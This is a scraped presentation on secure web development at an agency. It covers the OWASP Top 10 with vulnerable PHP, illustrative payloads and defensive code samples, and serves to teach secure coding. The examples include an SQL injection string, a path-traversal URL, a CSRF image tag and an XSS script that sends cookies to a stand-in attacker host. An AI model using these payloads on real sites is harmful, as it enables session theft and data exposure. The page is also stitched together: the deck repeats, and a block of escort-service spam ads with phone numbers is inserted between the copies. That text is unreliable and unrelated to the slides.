25/11/2014
Developing Secure Web Apps
Mark Garratt
Introduction
• Was: UH Student - Graduated 2012
• Now: Full Stack Developer at Cyber-Duck
• Things I do:
– Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc.
– System Administrator: Linux server management
– Security Tester: Reviewing and testing web apps
• Things I use:
– TDD / BDD
– Continuous Integration (Jenkins/Travis)
– Vagrant + Docker
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 2
Knowledge Transfer Partnerships
“A relationship formed between a company and an academic
institution ('Knowledge Base' partner), which facilitates the transfer of
knowledge, technology and skills to which the company partner
currently has no access. Each partnership employs one or more recently
qualified people (known as an Associate) to work in a company on a
project of strategic importance to the business, whilst also being
supervised by the Knowledge Base Partner.
Projects vary in length between 12 and 36 months. The Associates are
either postgraduate researchers, university graduates, or individuals
qualified to at least NVQ (Level 4) or equivalent.”
WHEN YOU GRADUATE APPLY FOR THESE
This talk…
• A bit about Cyber-Duck
• The development process
• Server security
• Application security
• Testing
About Cyber-Duck
Our Clients
The process
• Research
– Determine all security considerations for the project
• User Experience
– Follow best practices
• Art Direction
• Development
– Design production environment
– Secure coding
– Continuous testing
• Marketing
• Support
– Bug reports
– More testing
Server Security
• Type of server
– Cloud, dedicated, shared, in-house
• Server stack
– Operating system
– Language / Technology
– Database / Caching
– Scaling options
• Protection
– Anti-virus & Anti-malware
– Firewalls & IPS
– Back ups
– Others…
Server Management
• Most servers have similar configurations
• More clients = more traffic = more servers
• Need a way to keep all of them up to date
• We use Configuration Management software
• Several are available: Ansible, Chef, Puppet, etc.
We use Puppet
• Master server holds the config for all servers
• Agent servers read their config every half an hour
• Patch once, everything updates
• Able to use with Vagrant for development
Application Security
• Starts in the research phase of a project
– Evaluate possible points of attack
• UX designs the application with secure methods
• Security is most relevant during Development
– Be aware of vulnerabilities
– Follow safe practices
– Test for missed vulnerabilities
• Post-launch continue testing
– Bugs may reveal vulnerabilities
– Bug-fixes may create vulnerabilities
Staying aware of vulnerabilities
• Official lists and statistics – OWASP Top 10, CSA, etc.
• Mailing lists
• Industry news
• Blogs
• Social media – especially twitter
• Common Vulnerability Scoring System (CVSS)
– https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months
OWASP Top 10
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Components with Known Vulnerabilities
A10 Unvalidated Redirects and Forwards
Injection
• Most common is SQL injection
• Applications are vulnerable when user input is not validated
Example:
<?php
// Deliberately vulnerable example from the slide: the POSTed value is
// spliced straight into the SQL text, and mysql_query() offers no
// parameter binding, so the input can change the statement itself.
$user = $_POST['user_id'];
$query = "SELECT * FROM users WHERE id LIKE '%$user%'";
$result = mysql_query($query);
user_id = "' OR 1; #"
"SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
http://xkcd.com/327/
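As an added example (not from the slides), the same query built two ways in Node.js: the string concatenation that yields exactly the injected statement above, beside an input-validated, parameterized form of the kind a driver's `execute(sql, params)` call accepts. Function names are this example's own and no database connection is made.

```javascript
// Added example: the slide's vulnerable query reproduced in Node.js,
// beside a validated, parameterized form. No database is contacted.

// Vulnerable: user input becomes part of the SQL text, so characters
// such as the quote and the comment marker rewrite the statement.
function buildUnsafeQuery(userId) {
  return "SELECT * FROM users WHERE id LIKE '%" + userId + "%'";
}

// Step 1: validate. A user id is a positive integer; anything else is
// rejected before it gets anywhere near the database.
function parseUserId(raw) {
  if (typeof raw !== 'string' || !/^[1-9][0-9]*$/.test(raw)) {
    return null;
  }
  return Number(raw);
}

// Step 2: parameterize. The SQL text is a constant and the value travels
// separately (the shape a driver's execute(sql, params) expects), so the
// value can never alter the statement's structure. Because ids are
// integers, an equality test replaces the slide's LIKE '%...%'.
function buildSafeQuery(raw) {
  const id = parseUserId(raw);
  if (id === null) {
    return { error: 'invalid user id' };
  }
  return { sql: 'SELECT * FROM users WHERE id = ?', params: [id] };
}

// Constructed input: the payload shown on the slide.
const payload = "' OR 1; #";
console.log(buildUnsafeQuery(payload));
// → SELECT * FROM users WHERE id LIKE '%' OR 1; #%'
console.log(buildSafeQuery(payload)); // → { error: 'invalid user id' }
console.log(buildSafeQuery('42'));    // → { sql: '...id = ?', params: [ 42 ] }
```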
Broken Authentication and Session Management
• Misconfiguration of authentication and session management
• Attackers use this to compromise passwords, keys, session tokens or other valuable data
Example: Session Hijacking
http://example.com/loggedin?sess_id=a1b2c3d4e5f6
If the victim emails this link, whoever receives it is logged in to the victim's account.
Cross-Site Scripting (XSS)
• Occurs when unvalidated user input is sent to the browser
• Allows an attacker to execute scripts in the victim's browser
Example: Comment forms
A comment is left:
<script type="text/javascript">
document.location = "http://attacker.com/post?cookie=" + document.cookie;
</script>
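As an added example (not from the slides), the comment-form case handled in Node.js: user content is HTML-encoded when rendered, so the comment above is displayed as text rather than run, with a Content-Security-Policy as a second line of defence. Function names are this example's own.

```javascript
// Added example (not from the slides): HTML-encode user content at output
// time so a stored comment is displayed as text, not executed as script.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for the HTML text and double-quoted-attribute contexts. Other
// contexts (URLs, JavaScript strings, CSS) need their own encoders.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Encode at render time, not at save time: the raw text stays intact in
// the database and each output context gets the encoding it needs.
function renderComment(author, body) {
  return `<li class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Second line of defence: a Content-Security-Policy that allows scripts
// only from the site's own origin, so an inline <script> in a comment
// would be refused by the browser even if encoding were missed somewhere.
function securityHeaders() {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Constructed input: the comment from the slide.
const hostileComment =
  '<script type="text/javascript">document.location = ' +
  '"http://attacker.com/post?cookie=" + document.cookie;</script>';

console.log(renderComment('guest', hostileComment));
```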
Insecure Direct Object References
• Internal implementation details are revealed to the user, e.g. a file location or database key
• If the reference is not properly protected, an attacker can manipulate it
Example:
http://example.com/user_uploads/my_image.png
http://example.com/user_uploads/../../.htaccess
Security Misconfiguration
• Several programs are required to run a single web application
• Any one of these can have a vulnerability if misconfigured
• Secure settings should be defined, implemented, and
maintained, as defaults are often insecure.
• Software should be kept up to date.
Sensitive Data Exposure
• Applications dealing with sensitive data must protect it
• Suitable encryption or hashing must be used effectively
• Data needs to be protected in transit and at rest
Example:
A website encrypts credit card data in the database using the database's built-in encryption mechanism. An injection vulnerability in the application allows the database to decrypt the data for the attacker. If the application encrypted the data before storing it, the injection attack would only discover encrypted data.
Missing Function Level Access Control
• A user's access level is verified at login; it should also be verified on every subsequent request.
Example:
A website has user and admin areas. An attacker logs in as a user and is redirected to:
http://example.com/user/dashboard
They then go to the following URL with full access:
http://example.com/admin
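As an added example (not from the slides), a Node.js route table checked on every request, with the role taken from the server-side session. The route rules, status codes and middleware wiring are this example's own assumptions; the user-role request for /admin above gets a 403.

```javascript
// Added example (not from the slides): a route table checked on every
// request. Roles come from the server-side session, never from the request.
const ROUTE_RULES = [
  { prefix: '/admin', roles: ['admin'] },
  { prefix: '/user', roles: ['user', 'admin'] },
  { prefix: '/login', roles: ['anonymous', 'user', 'admin'] },
];

// Exact match or a path segment boundary, so "/adminx" does not match "/admin".
function matches(prefix, urlPath) {
  return urlPath === prefix || urlPath.startsWith(prefix + '/');
}

// Returns the HTTP status the request should get: 200, 401 (no session on
// a protected route) or 403 (logged in, wrong role). Unknown routes are
// denied, so a forgotten table entry fails closed rather than open.
function authorize(session, urlPath) {
  const rule = ROUTE_RULES.find((r) => matches(r.prefix, urlPath));
  if (!rule) return 403;
  const role = session && session.role ? session.role : 'anonymous';
  if (rule.roles.includes(role)) return 200;
  return role === 'anonymous' ? 401 : 403;
}

// Express-style middleware wrapping the check (hypothetical wiring:
// app.use(requireAccess) ahead of every route handler, so the check runs
// on each request and not only at login).
function requireAccess(req, res, next) {
  const status = authorize(req.session, req.path);
  if (status === 200) return next();
  res.status(status).end();
}
```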
Cross-Site Request Forgery (CSRF)
• An attacker tricks a user into sending data from one website to another.
Example:
A user is logged in to their bank account, which uses a session cookie. The user then visits an attacker's website containing the following code:
<img src="http://bank.com/transfer?to=12345&amount=100" />
The cookie is sent so bank.com thinks the user made the request.
Using Components with Known Vulnerabilities
• Modern web applications are built with libraries, frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code
• Not updating these libraries may introduce vulnerabilities
• Dependency managers (composer, npm, etc.) can help with this, but updates still need to be tested
Unvalidated Redirects and Forwards
• Sometimes it's necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse.
Example:
http://example.com/login?redirect=dashboard
Is changed by an attacker to
http://example.com/login?redirect=admin
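As an added example (not from the slides), two ways to validate the redirect parameter in Node.js: an allowlist of named destinations, under which `admin` is not a known name and falls back to the default, and a same-site path check for cases where arbitrary local paths must be accepted. The destination table and function names are this example's own.

```javascript
// Added example (not from the slides): validate the redirect parameter
// against an allowlist of named destinations, or, where arbitrary local
// paths must be accepted, require a same-site relative path.
const REDIRECT_TARGETS = new Map([
  ['dashboard', '/user/dashboard'],
  ['profile', '/user/profile'],
  ['orders', '/user/orders'],
]);
const DEFAULT_TARGET = '/user/dashboard';

// Strictest form: the parameter names a destination and the server
// supplies the path. "admin" from the slide is not a known name and falls
// back to the default; the admin area still has its own access check.
function redirectByName(raw) {
  return REDIRECT_TARGETS.get(raw) || DEFAULT_TARGET;
}

// Looser form for paths: exactly one leading slash (neither "//host" nor
// "/\host", which browsers treat as protocol-relative), no scheme, and
// no CR/LF that could split the Location header.
function isLocalPath(p) {
  if (typeof p !== 'string' || !p.startsWith('/')) return false;
  if (p.startsWith('//') || p.startsWith('/\\')) return false;
  if (/[\r\n]/.test(p)) return false;
  return true;
}

function redirectByPath(raw) {
  return isLocalPath(raw) ? raw : DEFAULT_TARGET;
}

console.log(redirectByName('dashboard')); // → /user/dashboard
console.log(redirectByName('admin'));     // → /user/dashboard
console.log(redirectByPath('//evil.example/login')); // → /user/dashboard
```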
Questions?
Contact
Mark Garratt
mark@cyber-duck.co.uk
@MGarratt88
http://www.cyber-duck.co.uk
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298  )#  Call Girls in DubaiRussian Call Girls in %(+971524965298  )#  Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 

Developing Secure Web Apps

Server Security
• Type of server
– Cloud, dedicated, shared, in-house
• Server stack
– Operating system
– Language / Technology
– Database / Caching
– Scaling options
• Protection
– Anti-virus & Anti-malware
– Firewalls & IPS
– Back ups
– Others…
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 8
Server Management
• Most servers have similar configurations
• More clients = more traffic = more servers
• Need a way to keep all of them up to date
• We use Configuration Management software
• Several available: Ansible, Chef, Puppet, etc.
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 9
We use Puppet
• Master server holds the config for all servers
• Agent servers read their config every half an hour
• Patch once, everything updates
• Able to use with Vagrant for development
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 10
Application Security
• Starts in the research phase of a project
– Evaluate possible points of attack
• UX designs the application with secure methods
• Security is most relevant during Development
– Be aware of vulnerabilities
– Follow safe practices
– Test for missed vulnerabilities
• Post-launch, continue testing
– Bugs may reveal vulnerabilities
– Bug-fixes may create vulnerabilities
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 11
Staying aware of vulnerabilities
• Official lists and statistics
– OWASP Top 10, CSA, etc.
• Mailing lists
• Industry news
• Blogs
• Social media – especially Twitter
• Common Vulnerability Scoring System (CVSS)
– https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 12
OWASP Top 10
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Components with Known Vulnerabilities
A10 Unvalidated Redirects and Forwards
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 13
Injection
• Most common is SQL injection
• Applications are vulnerable when user input is not validated
Example:
<?php
$user = $_POST['user_id'];                                  // untrusted input, used as-is
$query = "SELECT * FROM users WHERE id LIKE '%$user%'";     // input concatenated into the SQL text
$result = mysql_query($query);
With user_id = "' OR 1; #" the query becomes:
"SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 14
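The slide's vulnerable query beside its parameterised form, as an added example (not code from the talk), run against a constructed in-memory SQLite table so both behaviours can be observed; the payload is the SQLite twin of the slide's MySQL one, since SQLite has no `#` comment.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the slide's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("u100", "alice"), ("u200", "bob"), ("u300", "carol")])
    return conn


def find_users_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Same shape as the slide's PHP: the raw parameter is pasted into the SQL text,
    so a quote inside it closes the string literal and the remainder is parsed as SQL."""
    query = f"SELECT name FROM users WHERE id LIKE '%{user_id}%'"
    return [row[0] for row in conn.execute(query)]


def find_users_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised form: the driver binds the value as data, never as SQL text,
    so the same payload is merely an odd LIKE pattern that matches nothing."""
    query = "SELECT name FROM users WHERE id LIKE ?"
    return [row[0] for row in conn.execute(query, (f"%{user_id}%",))]


# Constructed payload, equivalent to the slide's "' OR 1; #": the trailing quote is
# balanced with OR ' because SQLite does not treat "#" as a comment marker.
PAYLOAD = "' OR 1 OR '"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_users_vulnerable(db, PAYLOAD))  # every user leaks
    print("safe:      ", find_users_safe(db, PAYLOAD))        # []
```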
http://xkcd.com/327/
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 15
Broken Authentication and Session Management
• Misconfiguration of authentication and session management
• Attackers use this to compromise passwords, keys, session tokens or other valuable data
Example: Session Hijacking
http://example.com/loggedin?sess_id=a1b2c3d4e5f6
The victim emails this link; whoever receives it is logged in to the victim's account
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 16
Cross-Site Scripting (XSS)
• Occurs when un-validated user input is sent to the browser
• Allows an attacker to execute scripts in the victim's browser
Example: Comment forms
A comment is left:
<script type="text/javascript">
document.location = "http://attacker.com/post?cookie=" + document.cookie;
</script>
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 17
Insecure Direct Object References
• Internal implementations are revealed to the user, e.g. a file location or database key
• This is not properly protected, allowing an attacker to manipulate the reference
Example:
http://example.com/user_uploads/my_image.png
http://example.com/user_uploads/../../.htaccess
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 18
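An added example (not from the talk) of serving uploads without exposing the direct reference: an opaque upload id is looked up in a constructed ownership table, and the stored filename is then proven to stay inside the upload directory. The `UPLOAD_ROOT` path and the `UPLOADS` table are assumptions.

```python
import posixpath

UPLOAD_ROOT = "/var/www/example.com/user_uploads"   # assumed storage directory

# Constructed stand-in for an uploads table: opaque id -> (owner, stored filename).
UPLOADS = {
    "f8c1": ("alice", "my_image.png"),
    "9d02": ("bob", "invoice.pdf"),
}


def safe_upload_path(filename: str) -> str:
    """Join filename onto UPLOAD_ROOT and prove the result is still inside it."""
    if "\\" in filename or "\x00" in filename:
        raise PermissionError(f"bad characters in {filename!r}")
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, filename))
    # normpath collapses ".." segments, so the slide's ../../.htaccess lands outside
    # the root and fails the containment check; an absolute filename fails it too.
    if posixpath.commonpath([UPLOAD_ROOT, full]) != UPLOAD_ROOT or full == UPLOAD_ROOT:
        raise PermissionError(f"{filename!r} escapes the upload directory")
    if posixpath.basename(full).startswith("."):
        raise PermissionError("dotfiles such as .htaccess are never served")
    return full


def serve_upload(current_user: str, upload_id: str) -> str:
    """Resolve an opaque upload id to a path, checking ownership on every request."""
    record = UPLOADS.get(upload_id)
    if record is None:
        raise LookupError("no such upload")
    owner, filename = record
    if owner != current_user:
        raise PermissionError("upload belongs to another user")
    return safe_upload_path(filename)


if __name__ == "__main__":
    print(serve_upload("alice", "f8c1"))          # .../user_uploads/my_image.png
    try:
        safe_upload_path("../../.htaccess")      # the slide's traversal attempt
    except PermissionError as err:
        print("refused:", err)
```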
Security Misconfiguration
• Several programs are required to run a single web application
• Any one of these can have a vulnerability if misconfigured
• Secure settings should be defined, implemented, and maintained, as defaults are often insecure
• Software should be kept up to date
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 19
Sensitive Data Exposure
• Applications dealing with sensitive data must protect it
• Suitable encryption or hashing must be used effectively
• Data needs to be protected in transit and at rest
Example:
A website encrypts credit card data in the database using the built-in encryption mechanism. An injection vulnerability exists in the application, allowing database data to be decrypted. If the application had encrypted the data before storing it, the injection attack would only recover encrypted data.
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 20
Missing Function Level Access Control
• When a user logs in, their access level is verified; it should also be verified on each subsequent request.
Example:
A website has user and admin areas. An attacker logs in as a user and is redirected to:
http://example.com/user/dashboard
They then go to the following URL with full access:
http://example.com/admin
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 21
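An added example (not from the talk) covering both the session-hijacking slide and the access-control slide: sessions live server-side and are rotated on login, the id is read only from the cookie (so the slide's `?sess_id=` link logs nobody in), and the role is re-checked on every request rather than only at login. The session store, user table and 30-minute timeout are assumptions.

```python
import secrets

SESSION_TTL = 30 * 60          # assumed idle timeout in seconds
SESSIONS = {}                  # constructed in-memory session table: id -> record
USERS = {"alice": "user", "root": "admin"}   # constructed; password check assumed done


def login(username: str, presented_cookies: dict, now: float) -> str:
    """Issue a brand-new session id on login and drop whatever id the client arrived with."""
    SESSIONS.pop(presented_cookies.get("session"), None)   # defeats session fixation
    sid = secrets.token_urlsafe(32)                        # 256 bits from the OS CSPRNG
    SESSIONS[sid] = {"user": username, "role": USERS[username], "last_seen": now}
    return sid   # send as: Set-Cookie: session=<sid>; HttpOnly; Secure; SameSite=Lax


def authorize(cookies: dict, query: dict, required_role: str, now: float) -> str:
    """Resolve the caller for one request; returns the username or raises PermissionError.
    `query` is deliberately ignored: a sess_id in the URL, as in the slide's emailed
    link, never identifies anyone, so forwarding the link grants nothing."""
    sid = cookies.get("session")
    record = SESSIONS.get(sid) if sid else None
    if record is None or now - record["last_seen"] > SESSION_TTL:
        SESSIONS.pop(sid, None)                 # expired ids are purged, not revived
        raise PermissionError("not logged in")
    record["last_seen"] = now
    # Function-level check on every request: the /admin handler asks for "admin".
    if required_role == "admin" and record["role"] != "admin":
        raise PermissionError("admin area requires the admin role")
    return record["user"]


if __name__ == "__main__":
    sid = login("alice", {}, now=1000.0)
    print(authorize({"session": sid}, {}, "user", now=1001.0))        # alice
    for cookies, query, role in (({}, {"sess_id": sid}, "user"),     # id only in URL
                                 ({"session": sid}, {}, "admin")):   # user hits /admin
        try:
            authorize(cookies, query, role, now=1002.0)
        except PermissionError as err:
            print("refused:", err)
```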
Cross-Site Request Forgery (CSRF)
• An attacker tricks a user into sending data from one website to another.
Example:
A user is logged in to their bank account, which uses a session cookie. The user then visits an attacker's website with the following code:
<img src="http://bank.com/transfer?to=12345&amount=100" />
The cookie is sent, so bank.com thinks the user made the request.
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 22
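The bank-side handler for the slide's transfer request, as an added example (not from the talk): the browser still attaches the cookie, but the forged `<img>` request is refused because it is a GET and carries no per-session token. `SECRET_KEY` and the request shapes are constructed.

```python
import hashlib
import hmac

SECRET_KEY = b"constructed-server-secret"   # assumed: from server config, never sent to clients


def csrf_token(session_id: str) -> str:
    """Per-session token derived from the server secret. The bank embeds it in its own
    forms; a page on the attacker's origin cannot read it out of the user's browser."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(method: str, cookies: dict, form: dict) -> str:
    """Handler for bank.com/transfer. The cookie proves which browser this is, not that
    the user meant to send the request, so two further checks are applied."""
    # 1. State changes only over POST: the slide's <img src=...> can only issue a GET.
    if method != "POST":
        return "405 use POST"
    session_id = cookies.get("session")
    if session_id is None:
        return "401 not logged in"
    # 2. The form must carry the token bound to this session; compare in constant time.
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return "403 missing or invalid CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


# Constructed requests. Both arrive with the bank.com cookie because the browser
# attaches it automatically, which is exactly what the slide's attack relies on.
COOKIES = {"session": "s3ss10n"}
FORGED = {"to": "12345", "amount": "100"}                    # what <img src=...> sends
GENUINE = dict(FORGED, csrf_token=csrf_token("s3ss10n"))    # from the bank's own form

if __name__ == "__main__":
    print(handle_transfer("GET", COOKIES, FORGED))     # 405 use POST
    print(handle_transfer("POST", COOKIES, FORGED))    # 403 missing or invalid CSRF token
    print(handle_transfer("POST", COOKIES, GENUINE))   # 200 transferred 100 to 12345
```

Marking the session cookie `SameSite=Lax` or `Strict` adds a second, browser-enforced layer on top of the token check.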
Using Components with Known Vulnerabilities
• Modern web applications are built with libraries, frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code
• Not updating these libraries may introduce vulnerabilities
• Dependency managers (composer, npm, etc.) can help with this, but updates still need to be tested
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 23
Unvalidated Redirects and Forwards
• Sometimes it's necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse.
Example:
http://example.com/login?redirect=dashboard
is changed by an attacker to
http://example.com/login?redirect=admin
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 24
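An added example (not from the talk) of validating the `redirect` parameter from the slide's login URL: named targets come from an allowlist, and any other value must be a same-site path inside the user area, so both `redirect=admin` and off-site targets fall back to the default. The origin, allowlist and `/user/` area are assumptions.

```python
from urllib.parse import urljoin, urlsplit

ORIGIN = "http://example.com"     # assumed site origin
DEFAULT = "/user/dashboard"
USER_AREA = "/user/"              # assumed: only paths under here are valid post-login targets
# Constructed allowlist for bare names like the slide's ?redirect=dashboard. "admin" is
# absent on purpose, so the tampered ?redirect=admin resolves to DEFAULT.
NAMED = {"dashboard": "/user/dashboard", "profile": "/user/profile"}


def safe_redirect(target: str) -> str:
    """Return a Location value that is guaranteed to stay on this site and in the user area."""
    if not target:
        return DEFAULT
    if target.isalnum():                       # bare name: allowlist only
        return NAMED.get(target, DEFAULT)
    # Browsers normalise backslashes and control characters in surprising ways; refuse them.
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return DEFAULT
    parts = urlsplit(target)
    # A scheme or host means an off-site redirect: http://attacker, //attacker, javascript:
    if parts.scheme or parts.netloc:
        return DEFAULT
    # Resolve against our own origin (this also collapses "..") and re-check host and area.
    resolved = urlsplit(urljoin(ORIGIN + "/", target))
    if resolved.netloc != urlsplit(ORIGIN).netloc or not resolved.path.startswith(USER_AREA):
        return DEFAULT
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")


if __name__ == "__main__":
    for value in ("dashboard", "admin", "/admin", "/user/../admin",
                  "//attacker.example/x", "/user/profile?tab=2"):
        print(f"{value!r:24} -> {safe_redirect(value)}")
```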

Editor's Notes

  1. Independent digital agency, based in Elstree. Specialise in UX. Established in 2005. Award winning, ISO accredited. User Experience – Web & Mobile – Hosting & Support – Marketing – Consulting
  2. Close choice between Puppet and Chef. Puppet has its own DSL, Chef uses Ruby. Puppet is a few years more established, but neither is new.